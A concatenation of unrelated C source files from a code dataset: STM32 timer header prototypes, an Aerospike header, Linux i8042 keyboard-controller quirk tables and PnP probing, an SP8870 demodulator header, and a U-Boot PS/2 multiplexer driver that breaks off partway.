/** @defgroup TIM_Legacy * @{ */ #define TIM_DMABurstLength_1Byte TIM_DMABurstLength_1Transfer #define TIM_DMABurstLength_2Bytes TIM_DMABurstLength_2Transfers #define TIM_DMABurstLength_3Bytes TIM_DMABurstLength_3Transfers #define TIM_DMABurstLength_4Bytes TIM_DMABurstLength_4Transfers #define TIM_DMABurstLength_5Bytes TIM_DMABurstLength_5Transfers #define TIM_DMABurstLength_6Bytes TIM_DMABurstLength_6Transfers #define TIM_DMABurstLength_7Bytes TIM_DMABurstLength_7Transfers #define TIM_DMABurstLength_8Bytes TIM_DMABurstLength_8Transfers #define TIM_DMABurstLength_9Bytes TIM_DMABurstLength_9Transfers #define TIM_DMABurstLength_10Bytes TIM_DMABurstLength_10Transfers #define TIM_DMABurstLength_11Bytes TIM_DMABurstLength_11Transfers #define TIM_DMABurstLength_12Bytes TIM_DMABurstLength_12Transfers #define TIM_DMABurstLength_13Bytes TIM_DMABurstLength_13Transfers #define TIM_DMABurstLength_14Bytes TIM_DMABurstLength_14Transfers #define TIM_DMABurstLength_15Bytes TIM_DMABurstLength_15Transfers #define TIM_DMABurstLength_16Bytes TIM_DMABurstLength_16Transfers #define TIM_DMABurstLength_17Bytes TIM_DMABurstLength_17Transfers #define TIM_DMABurstLength_18Bytes TIM_DMABurstLength_18Transfers /** * @} */ /** * @} */ /** @defgroup TIM_Exported_Macros * @{ */ /** * @} */ /** @defgroup TIM_Exported_Functions * @{ */ void TIM_DeInit(TIM_TypeDef* TIMx); void TIM_TimeBaseInit(TIM_TypeDef* TIMx, TIM_TimeBaseInitTypeDef* TIM_TimeBaseInitStruct); void TIM_OC1Init(TIM_TypeDef* TIMx, TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_OC2Init(TIM_TypeDef* TIMx, TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_OC3Init(TIM_TypeDef* TIMx, TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_OC4Init(TIM_TypeDef* TIMx, TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_ICInit(TIM_TypeDef* TIMx, TIM_ICInitTypeDef* TIM_ICInitStruct); void TIM_PWMIConfig(TIM_TypeDef* TIMx, TIM_ICInitTypeDef* TIM_ICInitStruct); void TIM_BDTRConfig(TIM_TypeDef* TIMx, TIM_BDTRInitTypeDef *TIM_BDTRInitStruct); void TIM_TimeBaseStructInit(TIM_TimeBaseInitTypeDef* TIM_TimeBaseInitStruct); void TIM_OCStructInit(TIM_OCInitTypeDef* TIM_OCInitStruct); void TIM_ICStructInit(TIM_ICInitTypeDef* TIM_ICInitStruct); void TIM_BDTRStructInit(TIM_BDTRInitTypeDef* TIM_BDTRInitStruct); void TIM_Cmd(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_CtrlPWMOutputs(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_ITConfig(TIM_TypeDef* TIMx, uint16_t TIM_IT, FunctionalState NewState); void TIM_GenerateEvent(TIM_TypeDef* TIMx, uint16_t TIM_EventSource); void TIM_DMAConfig(TIM_TypeDef* TIMx, uint16_t TIM_DMABase, uint16_t TIM_DMABurstLength); void TIM_DMACmd(TIM_TypeDef* TIMx, uint16_t TIM_DMASource, FunctionalState NewState); void TIM_InternalClockConfig(TIM_TypeDef* TIMx); void TIM_ITRxExternalClockConfig(TIM_TypeDef* TIMx, uint16_t TIM_InputTriggerSource); void TIM_TIxExternalClockConfig(TIM_TypeDef* TIMx, uint16_t TIM_TIxExternalCLKSource, uint16_t TIM_ICPolarity, uint16_t ICFilter); void TIM_ETRClockMode1Config(TIM_TypeDef* TIMx, uint16_t TIM_ExtTRGPrescaler, uint16_t TIM_ExtTRGPolarity, uint16_t ExtTRGFilter); void TIM_ETRClockMode2Config(TIM_TypeDef* TIMx, uint16_t TIM_ExtTRGPrescaler, uint16_t TIM_ExtTRGPolarity, uint16_t ExtTRGFilter); void TIM_ETRConfig(TIM_TypeDef* TIMx, uint16_t TIM_ExtTRGPrescaler, uint16_t TIM_ExtTRGPolarity, uint16_t ExtTRGFilter); void TIM_PrescalerConfig(TIM_TypeDef* TIMx, uint16_t Prescaler, uint16_t TIM_PSCReloadMode); void TIM_CounterModeConfig(TIM_TypeDef* TIMx, uint16_t TIM_CounterMode); void TIM_SelectInputTrigger(TIM_TypeDef* TIMx, uint16_t TIM_InputTriggerSource); void TIM_EncoderInterfaceConfig(TIM_TypeDef* TIMx, uint16_t TIM_EncoderMode, uint16_t TIM_IC1Polarity, uint16_t TIM_IC2Polarity); void TIM_ForcedOC1Config(TIM_TypeDef* TIMx, uint16_t TIM_ForcedAction); void TIM_ForcedOC2Config(TIM_TypeDef* TIMx, uint16_t TIM_ForcedAction); void TIM_ForcedOC3Config(TIM_TypeDef* TIMx, uint16_t TIM_ForcedAction); void TIM_ForcedOC4Config(TIM_TypeDef* TIMx, uint16_t TIM_ForcedAction); void TIM_ARRPreloadConfig(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_SelectCOM(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_SelectCCDMA(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_CCPreloadControl(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_OC1PreloadConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPreload); void TIM_OC2PreloadConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPreload); void TIM_OC3PreloadConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPreload); void TIM_OC4PreloadConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPreload); void TIM_OC1FastConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCFast); void TIM_OC2FastConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCFast); void TIM_OC3FastConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCFast); void TIM_OC4FastConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCFast); void TIM_ClearOC1Ref(TIM_TypeDef* TIMx, uint16_t TIM_OCClear); void TIM_ClearOC2Ref(TIM_TypeDef* TIMx, uint16_t TIM_OCClear); void TIM_ClearOC3Ref(TIM_TypeDef* TIMx, uint16_t TIM_OCClear); void TIM_ClearOC4Ref(TIM_TypeDef* TIMx, uint16_t TIM_OCClear); void TIM_OC1PolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPolarity); void TIM_OC1NPolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCNPolarity); void TIM_OC2PolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPolarity); void TIM_OC2NPolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCNPolarity); void TIM_OC3PolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPolarity); void TIM_OC3NPolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCNPolarity); void TIM_OC4PolarityConfig(TIM_TypeDef* TIMx, uint16_t TIM_OCPolarity); void TIM_CCxCmd(TIM_TypeDef* TIMx, uint16_t TIM_Channel, uint16_t TIM_CCx); void TIM_CCxNCmd(TIM_TypeDef* TIMx, uint16_t TIM_Channel, uint16_t TIM_CCxN); void TIM_SelectOCxM(TIM_TypeDef* TIMx, uint16_t TIM_Channel, uint16_t TIM_OCMode); void TIM_UpdateDisableConfig(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_UpdateRequestConfig(TIM_TypeDef* TIMx, uint16_t TIM_UpdateSource); void TIM_SelectHallSensor(TIM_TypeDef* TIMx, FunctionalState NewState); void TIM_SelectOnePulseMode(TIM_TypeDef* TIMx, uint16_t TIM_OPMode); void TIM_SelectOutputTrigger(TIM_TypeDef* TIMx, uint16_t TIM_TRGOSource); void TIM_SelectSlaveMode(TIM_TypeDef* TIMx, uint16_t TIM_SlaveMode); void TIM_SelectMasterSlaveMode(TIM_TypeDef* TIMx, uint16_t TIM_MasterSlaveMode); void TIM_SetCounter(TIM_TypeDef* TIMx, uint16_t Counter); void TIM_SetAutoreload(TIM_TypeDef* TIMx, uint16_t Autoreload); void TIM_SetCompare1(TIM_TypeDef* TIMx, uint16_t Compare1); void TIM_SetCompare2(TIM_TypeDef* TIMx, uint16_t Compare2); void TIM_SetCompare3(TIM_TypeDef* TIMx, uint16_t Compare3); void TIM_SetCompare4(TIM_TypeDef* TIMx, uint16_t Compare4); void TIM_SetIC1Prescaler(TIM_TypeDef* TIMx, uint16_t TIM_ICPSC); void TIM_SetIC2Prescaler(TIM_TypeDef* TIMx, uint16_t TIM_ICPSC); void TIM_SetIC3Prescaler(TIM_TypeDef* TIMx, uint16_t TIM_ICPSC); void TIM_SetIC4Prescaler(TIM_TypeDef* TIMx, uint16_t TIM_ICPSC); void TIM_SetClockDivision(TIM_TypeDef* TIMx, uint16_t TIM_CKD); uint16_t TIM_GetCapture1(TIM_TypeDef* TIMx); uint16_t TIM_GetCapture2(TIM_TypeDef* TIMx); uint16_t TIM_GetCapture3(TIM_TypeDef* TIMx); uint16_t TIM_GetCapture4(TIM_TypeDef* TIMx); uint16_t TIM_GetCounter(TIM_TypeDef* TIMx); uint16_t TIM_GetPrescaler(TIM_TypeDef* TIMx); FlagStatus TIM_GetFlagStatus(TIM_TypeDef* TIMx, uint16_t TIM_FLAG); void TIM_ClearFlag(TIM_TypeDef* TIMx, uint16_t TIM_FLAG); ITStatus TIM_GetITStatus(TIM_TypeDef* TIMx, uint16_t TIM_IT); void TIM_ClearITPendingBit(TIM_TypeDef* TIMx, uint16_t TIM_IT); #ifdef __cplusplus } #endif #endif /*__STM32F10x_TIM_H */ /** * @} */ /** * @} */ /** * @} */ /******************* (C) COPYRIGHT 2011 STMicroelectronics *****END OF FILE****/
{ "language": "C" }
/* * service_list.h * * Copyright (C) 2017-2018 Aerospike, Inc. * * Portions may be licensed to Aerospike, Inc. under one or more contributor * license agreements. * * This program is free software: you can redistribute it and/or modify it under * the terms of the GNU Affero General Public License as published by the Free * Software Foundation, either version 3 of the License, or (at your option) any * later version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more * details. * * You should have received a copy of the GNU Affero General Public License * along with this program. If not, see http://www.gnu.org/licenses/ */ #pragma once //========================================================== // Includes. // #include <stdint.h> #include "dynbuf.h" //========================================================== // Public API. // void as_service_list_init(void); int32_t as_service_list_dynamic(char *key, cf_dyn_buf *db); int32_t as_service_list_command(char *key, char *par, cf_dyn_buf *db);
{ "language": "C" }
#ifndef _I8042_X86IA64IO_H #define _I8042_X86IA64IO_H /* * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 as published by * the Free Software Foundation. */ /* * Names. */ #define I8042_KBD_PHYS_DESC "isa0060/serio0" #define I8042_AUX_PHYS_DESC "isa0060/serio1" #define I8042_MUX_PHYS_DESC "isa0060/serio%d" /* * IRQs. */ #if defined(__ia64__) # define I8042_MAP_IRQ(x) isa_irq_to_vector((x)) #else # define I8042_MAP_IRQ(x) (x) #endif #define I8042_KBD_IRQ i8042_kbd_irq #define I8042_AUX_IRQ i8042_aux_irq static int i8042_kbd_irq; static int i8042_aux_irq; /* * Register numbers. */ #define I8042_COMMAND_REG i8042_command_reg #define I8042_STATUS_REG i8042_command_reg #define I8042_DATA_REG i8042_data_reg static int i8042_command_reg = 0x64; static int i8042_data_reg = 0x60; static inline int i8042_read_data(void) { return inb(I8042_DATA_REG); } static inline int i8042_read_status(void) { return inb(I8042_STATUS_REG); } static inline void i8042_write_data(int val) { outb(val, I8042_DATA_REG); } static inline void i8042_write_command(int val) { outb(val, I8042_COMMAND_REG); } #if defined(__i386__) #include <linux/dmi.h> static struct dmi_system_id __initdata i8042_dmi_noloop_table[] = { { /* AUX LOOP command does not raise AUX IRQ */ .ident = "ASUS P65UP5", .matches = { DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK Computer INC."), DMI_MATCH(DMI_BOARD_NAME, "P/I-P65UP5"), DMI_MATCH(DMI_BOARD_VERSION, "REV 2.X"), }, }, { .ident = "Compaq Proliant 8500", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Compaq"), DMI_MATCH(DMI_PRODUCT_NAME , "ProLiant"), DMI_MATCH(DMI_PRODUCT_VERSION, "8500"), }, }, { .ident = "Compaq Proliant DL760", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Compaq"), DMI_MATCH(DMI_PRODUCT_NAME , "ProLiant"), DMI_MATCH(DMI_PRODUCT_VERSION, "DL760"), }, }, { .ident = "OQO Model 01", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "OQO"), DMI_MATCH(DMI_PRODUCT_NAME, "ZEPTO"), DMI_MATCH(DMI_PRODUCT_VERSION, "00"), }, }, { /* AUX LOOP does not work properly */ .ident = "ULI EV4873", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "ULI"), DMI_MATCH(DMI_PRODUCT_NAME, "EV4873"), DMI_MATCH(DMI_PRODUCT_VERSION, "5a"), }, }, { } }; /* * Some Fujitsu notebooks are having trouble with touchpads if * active multiplexing mode is activated. Luckily they don't have * external PS/2 ports so we can safely disable it. * ... apparently some Toshibas don't like MUX mode either and * die horrible death on reboot. */ static struct dmi_system_id __initdata i8042_dmi_nomux_table[] = { { .ident = "Fujitsu Lifebook P7010/P7010D", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "P7010"), }, }, { .ident = "Fujitsu Lifebook P7010", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU SIEMENS"), DMI_MATCH(DMI_PRODUCT_NAME, "0000000000"), }, }, { .ident = "Fujitsu Lifebook P5020D", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "LifeBook P Series"), }, }, { .ident = "Fujitsu Lifebook S2000", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "LifeBook S Series"), }, }, { .ident = "Fujitsu Lifebook S6230", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "LifeBook S6230"), }, }, { .ident = "Fujitsu T70H", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "FMVLT70H"), }, }, { .ident = "Fujitsu-Siemens Lifebook T3010", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU SIEMENS"), DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK T3010"), }, }, { .ident = "Fujitsu-Siemens Lifebook E4010", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU SIEMENS"), DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK E4010"), }, }, { /* * No data is coming from the touchscreen unless KBC * is in legacy mode. */ .ident = "Panasonic CF-29", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Matsushita"), DMI_MATCH(DMI_PRODUCT_NAME, "CF-29"), }, }, { /* * Errors on MUX ports are reported without raising AUXDATA * causing "spurious NAK" messages. */ .ident = "HP Pavilion DV4017EA", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"), DMI_MATCH(DMI_PRODUCT_NAME, "Pavilion dv4000 (EA032EA#ABF)"), }, }, { /* * Like DV4017EA does not raise AUXERR for errors on MUX ports. */ .ident = "HP Pavilion ZT1000", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"), DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion Notebook PC"), DMI_MATCH(DMI_PRODUCT_VERSION, "HP Pavilion Notebook ZT1000"), }, }, { .ident = "Toshiba P10", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"), DMI_MATCH(DMI_PRODUCT_NAME, "Satellite P10"), }, }, { .ident = "Toshiba Equium A110", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"), DMI_MATCH(DMI_PRODUCT_NAME, "EQUIUM A110"), }, }, { .ident = "Alienware Sentia", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "ALIENWARE"), DMI_MATCH(DMI_PRODUCT_NAME, "Sentia"), }, }, { .ident = "Sharp Actius MM20", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "SHARP"), DMI_MATCH(DMI_PRODUCT_NAME, "PC-MM20 Series"), }, }, { .ident = "Sony Vaio FS-115b", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"), DMI_MATCH(DMI_PRODUCT_NAME, "VGN-FS115B"), }, }, { .ident = "Amoi M636/A737", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Amoi Electronics CO.,LTD."), DMI_MATCH(DMI_PRODUCT_NAME, "M636/A737 platform"), }, }, { } }; #endif #ifdef CONFIG_PNP #include <linux/pnp.h> static int i8042_pnp_kbd_registered; static unsigned int i8042_pnp_kbd_devices; static int i8042_pnp_aux_registered; static unsigned int i8042_pnp_aux_devices; static int i8042_pnp_command_reg; static int i8042_pnp_data_reg; static int i8042_pnp_kbd_irq; static int i8042_pnp_aux_irq; static char i8042_pnp_kbd_name[32]; static char i8042_pnp_aux_name[32]; static int i8042_pnp_kbd_probe(struct pnp_dev *dev, const struct pnp_device_id *did) { if (pnp_port_valid(dev, 0) && pnp_port_len(dev, 0) == 1) i8042_pnp_data_reg = pnp_port_start(dev,0); if (pnp_port_valid(dev, 1) && pnp_port_len(dev, 1) == 1) i8042_pnp_command_reg = pnp_port_start(dev, 1); if (pnp_irq_valid(dev,0)) i8042_pnp_kbd_irq = pnp_irq(dev, 0); strncpy(i8042_pnp_kbd_name, did->id, sizeof(i8042_pnp_kbd_name)); if (strlen(pnp_dev_name(dev))) { strncat(i8042_pnp_kbd_name, ":", sizeof(i8042_pnp_kbd_name)); strncat(i8042_pnp_kbd_name, pnp_dev_name(dev), sizeof(i8042_pnp_kbd_name)); } i8042_pnp_kbd_devices++; return 0; } static int i8042_pnp_aux_probe(struct pnp_dev *dev, const struct pnp_device_id *did) { if (pnp_port_valid(dev, 0) && pnp_port_len(dev, 0) == 1) i8042_pnp_data_reg = pnp_port_start(dev,0); if (pnp_port_valid(dev, 1) && pnp_port_len(dev, 1) == 1) i8042_pnp_command_reg = pnp_port_start(dev, 1); if (pnp_irq_valid(dev, 0)) i8042_pnp_aux_irq = pnp_irq(dev, 0); strncpy(i8042_pnp_aux_name, did->id, sizeof(i8042_pnp_aux_name)); if (strlen(pnp_dev_name(dev))) { strncat(i8042_pnp_aux_name, ":", sizeof(i8042_pnp_aux_name)); strncat(i8042_pnp_aux_name, pnp_dev_name(dev), sizeof(i8042_pnp_aux_name)); } i8042_pnp_aux_devices++; return 0; } static struct pnp_device_id pnp_kbd_devids[] = { { .id = "PNP0303", .driver_data = 0 }, { .id = "PNP030b", .driver_data = 0 }, { .id = "", }, }; static struct pnp_driver i8042_pnp_kbd_driver = { .name = "i8042 kbd", .id_table = pnp_kbd_devids, .probe = i8042_pnp_kbd_probe, }; static struct pnp_device_id pnp_aux_devids[] = { { .id = "FJC6000", .driver_data = 0 }, { .id = "FJC6001", .driver_data = 0 }, { .id = "PNP0f03", .driver_data = 0 }, { .id = "PNP0f0b", .driver_data = 0 }, { .id = "PNP0f0e", .driver_data = 0 }, { .id = "PNP0f12", .driver_data = 0 }, { .id = "PNP0f13", .driver_data = 0 }, { .id = "PNP0f19", .driver_data = 0 }, { .id = "PNP0f1c", .driver_data = 0 }, { .id = "SYN0801", .driver_data = 0 }, { .id = "", }, }; static struct pnp_driver i8042_pnp_aux_driver = { .name = "i8042 aux", .id_table = pnp_aux_devids, .probe = i8042_pnp_aux_probe, }; static void i8042_pnp_exit(void) { if (i8042_pnp_kbd_registered) { i8042_pnp_kbd_registered = 0; pnp_unregister_driver(&i8042_pnp_kbd_driver); } if (i8042_pnp_aux_registered) { i8042_pnp_aux_registered = 0; pnp_unregister_driver(&i8042_pnp_aux_driver); } } static int __init i8042_pnp_init(void) { char kbd_irq_str[4] = { 0 }, aux_irq_str[4] = { 0 }; int err; if (i8042_nopnp) { printk(KERN_INFO "i8042: PNP detection disabled\n"); return 0; } err = pnp_register_driver(&i8042_pnp_kbd_driver); if (!err) i8042_pnp_kbd_registered = 1; err = pnp_register_driver(&i8042_pnp_aux_driver); if (!err) i8042_pnp_aux_registered = 1; if (!i8042_pnp_kbd_devices && !i8042_pnp_aux_devices) { i8042_pnp_exit(); #if defined(__ia64__) return -ENODEV; #else printk(KERN_INFO "PNP: No PS/2 controller found. Probing ports directly.\n"); return 0; #endif } if (i8042_pnp_kbd_devices) snprintf(kbd_irq_str, sizeof(kbd_irq_str), "%d", i8042_pnp_kbd_irq); if (i8042_pnp_aux_devices) snprintf(aux_irq_str, sizeof(aux_irq_str), "%d", i8042_pnp_aux_irq); printk(KERN_INFO "PNP: PS/2 Controller [%s%s%s] at %#x,%#x irq %s%s%s\n", i8042_pnp_kbd_name, (i8042_pnp_kbd_devices && i8042_pnp_aux_devices) ? "," : "", i8042_pnp_aux_name, i8042_pnp_data_reg, i8042_pnp_command_reg, kbd_irq_str, (i8042_pnp_kbd_devices && i8042_pnp_aux_devices) ? "," : "", aux_irq_str); #if defined(__ia64__) if (!i8042_pnp_kbd_devices) i8042_nokbd = 1; if (!i8042_pnp_aux_devices) i8042_noaux = 1; #endif if (((i8042_pnp_data_reg & ~0xf) == (i8042_data_reg & ~0xf) && i8042_pnp_data_reg != i8042_data_reg) || !i8042_pnp_data_reg) { printk(KERN_WARNING "PNP: PS/2 controller has invalid data port %#x; using default %#x\n", i8042_pnp_data_reg, i8042_data_reg); i8042_pnp_data_reg = i8042_data_reg; } if (((i8042_pnp_command_reg & ~0xf) == (i8042_command_reg & ~0xf) && i8042_pnp_command_reg != i8042_command_reg) || !i8042_pnp_command_reg) { printk(KERN_WARNING "PNP: PS/2 controller has invalid command port %#x; using default %#x\n", i8042_pnp_command_reg, i8042_command_reg); i8042_pnp_command_reg = i8042_command_reg; } if (!i8042_nokbd && !i8042_pnp_kbd_irq) { printk(KERN_WARNING "PNP: PS/2 controller doesn't have KBD irq; using default %d\n", i8042_kbd_irq); i8042_pnp_kbd_irq = i8042_kbd_irq; } if (!i8042_noaux && !i8042_pnp_aux_irq) { printk(KERN_WARNING "PNP: PS/2 controller doesn't have AUX irq; using default %d\n", i8042_aux_irq); i8042_pnp_aux_irq = i8042_aux_irq; } i8042_data_reg = i8042_pnp_data_reg; i8042_command_reg = i8042_pnp_command_reg; i8042_kbd_irq = i8042_pnp_kbd_irq; i8042_aux_irq = i8042_pnp_aux_irq; return 0; } #else static inline int i8042_pnp_init(void) { return 0; } static inline void i8042_pnp_exit(void) { } #endif static int __init i8042_platform_init(void) { int retval; /* * On ix86 platforms touching the i8042 data register region can do really * bad things. Because of this the region is always reserved on ix86 boxes. * * if (!request_region(I8042_DATA_REG, 16, "i8042")) * return -EBUSY; */ i8042_kbd_irq = I8042_MAP_IRQ(1); i8042_aux_irq = I8042_MAP_IRQ(12); retval = i8042_pnp_init(); if (retval) return retval; #if defined(__ia64__) i8042_reset = 1; #endif #if defined(__i386__) if (dmi_check_system(i8042_dmi_noloop_table)) i8042_noloop = 1; if (dmi_check_system(i8042_dmi_nomux_table)) i8042_nomux = 1; #endif return retval; } static inline void i8042_platform_exit(void) { i8042_pnp_exit(); } #endif /* _I8042_X86IA64IO_H */
{ "language": "C" }
/* Driver for Spase SP8870 demodulator Copyright (C) 1999 Juergen Peitz This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. */ #ifndef SP8870_H #define SP8870_H #include <linux/dvb/frontend.h> #include <linux/firmware.h> struct sp8870_config { /* the demodulator's i2c address */ u8 demod_address; /* request firmware for device */ int (*request_firmware)(struct dvb_frontend* fe, const struct firmware **fw, char* name); }; #if defined(CONFIG_DVB_SP8870) || (defined(CONFIG_DVB_SP8870_MODULE) && defined(MODULE)) extern struct dvb_frontend* sp8870_attach(const struct sp8870_config* config, struct i2c_adapter* i2c); #else static inline struct dvb_frontend* sp8870_attach(const struct sp8870_config* config, struct i2c_adapter* i2c) { printk(KERN_WARNING "%s: driver disabled by Kconfig\n", __func__); return NULL; } #endif // CONFIG_DVB_SP8870 #endif // SP8870_H
{ "language": "C" }
/*********************************************************************** * * (C) Copyright 2004 * DENX Software Engineering * Wolfgang Denk, wd@denx.de * * PS/2 multiplexer driver * * Originally from linux source (drivers/char/ps2mult.c) * * Uses simple serial driver (ps2ser.c) to access the multiplexer * Used by PS/2 keyboard driver (pc_keyb.c) * ***********************************************************************/ #include <common.h> #include <pc_keyb.h> #include <asm/atomic.h> #include <ps2mult.h> /* #define DEBUG_MULT */ /* #define DEBUG_KEYB */ #define KBD_STAT_DEFAULT (KBD_STAT_SELFTEST | KBD_STAT_UNLOCKED) #define PRINTF(format, args...) printf("ps2mult.c: " format, ## args) #ifdef DEBUG_MULT #define PRINTF_MULT(format, args...) printf("PS2MULT: " format, ## args) #else #define PRINTF_MULT(format, args...) #endif #ifdef DEBUG_KEYB #define PRINTF_KEYB(format, args...) printf("KEYB: " format, ## args) #else #define PRINTF_KEYB(format, args...) #endif static ulong start_time; static int init_done = 0; static int received_escape = 0; static int received_bsync = 0; static int received_selector = 0; static int kbd_command_active = 0; static int mouse_command_active = 0; static int ctl_command_active = 0; static u_char command_byte = 0; static void (*keyb_handler)(void *dev_id); static u_char ps2mult_buf [PS2BUF_SIZE]; static atomic_t ps2mult_buf_cnt; static int ps2mult_buf_in_idx; static int ps2mult_buf_out_idx; static u_char ps2mult_buf_status [PS2BUF_SIZE]; #ifndef CONFIG_BOARD_EARLY_INIT_R #error #define CONFIG_BOARD_EARLY_INIT_R and call ps2mult_early_init() in board_early_init_r() #endif void ps2mult_early_init (void) { start_time = get_timer(0); } static void ps2mult_send_byte(u_char byte, u_char sel) { ps2ser_putc(sel); if (sel == PS2MULT_KB_SELECTOR) { PRINTF_MULT("0x%02x send KEYBOARD\n", byte); kbd_command_active = 1; } else { PRINTF_MULT("0x%02x send MOUSE\n", byte); mouse_command_active = 1; } switch (byte) { case PS2MULT_ESCAPE: case PS2MULT_BSYNC: case PS2MULT_KB_SELECTOR: case PS2MULT_MS_SELECTOR: case PS2MULT_SESSION_START: case PS2MULT_SESSION_END: ps2ser_putc(PS2MULT_ESCAPE); break; default: break; } ps2ser_putc(byte); } static void ps2mult_receive_byte(u_char byte, u_char sel) { u_char status = KBD_STAT_DEFAULT; #if 1 /* Ignore mouse in U-Boot */ if (sel == PS2MULT_MS_SELECTOR) return; #endif if (sel == PS2MULT_KB_SELECTOR) { if (kbd_command_active) { if (!received_bsync) { PRINTF_MULT("0x%02x lost KEYBOARD !!!\n", byte); return; } else { kbd_command_active = 0; received_bsync = 0; } } PRINTF_MULT("0x%02x receive KEYBOARD\n", byte); status |= KBD_STAT_IBF | KBD_STAT_OBF; } else { if (mouse_command_active) { if (!received_bsync) { PRINTF_MULT("0x%02x lost MOUSE !!!\n", byte); return; } else { mouse_command_active = 0; received_bsync = 0; } } PRINTF_MULT("0x%02x receive MOUSE\n", byte); status |= KBD_STAT_IBF | KBD_STAT_OBF | KBD_STAT_MOUSE_OBF; } if (atomic_read(&ps2mult_buf_cnt) < PS2BUF_SIZE) { ps2mult_buf_status[ps2mult_buf_in_idx] = status; ps2mult_buf[ps2mult_buf_in_idx++] = byte; ps2mult_buf_in_idx &= (PS2BUF_SIZE - 1); atomic_inc(&ps2mult_buf_cnt); } else { PRINTF("buffer overflow\n"); } if (received_bsync) { PRINTF("unexpected BSYNC\n"); received_bsync = 0; } } void ps2mult_callback (int in_cnt) { int i; u_char byte; static int keyb_handler_active = 0; if (!init_done) { return; } for (i = 0; i < in_cnt; i ++) { byte = ps2ser_getc(); if (received_escape) { ps2mult_receive_byte(byte, received_selector); received_escape = 0; } else switch (byte) { case PS2MULT_ESCAPE: PRINTF_MULT("ESCAPE receive\n"); received_escape = 1; break; case PS2MULT_BSYNC: PRINTF_MULT("BSYNC receive\n"); received_bsync = 1; break; case PS2MULT_KB_SELECTOR: case PS2MULT_MS_SELECTOR: PRINTF_MULT("%s receive\n", byte == PS2MULT_KB_SELECTOR ? "KB_SEL" : "MS_SEL"); received_selector = byte; break; case PS2MULT_SESSION_START: case PS2MULT_SESSION_END: PRINTF_MULT("%s receive\n", byte == PS2MULT_SESSION_START ? "SESSION_START" : "SESSION_END"); break; default: ps2mult_receive_byte(byte, received_selector); } } if (keyb_handler && !keyb_handler_active && atomic_read(&ps2mult_buf_cnt)) { keyb_handler_active = 1; keyb_handler(NULL); keyb_handler_active = 0; } } u_char ps2mult_read_status(void) { u_char byte; if (atomic_read(&ps2mult_buf_cnt) == 0) { ps2ser_check(); } if (atomic_read(&ps2mult_buf_cnt)) { byte = ps2mult_buf_status[ps2mult_buf_out_idx]; } else { byte = KBD_STAT_DEFAULT; } PRINTF_KEYB("read_status()=0x%02x\n", byte); return byte; } u_char ps2mult_read_input(void) { u_char byte = 0; if (atomic_read(&ps2mult_buf_cnt) == 0) { ps2ser_check(); } if (atomic_read(&ps2mult_buf_cnt)) { byte = ps2mult_buf[ps2mult_buf_out_idx++]; ps2mult_buf_out_idx &= (PS2BUF_SIZE - 1); atomic_dec(&ps2mult_buf_cnt); } 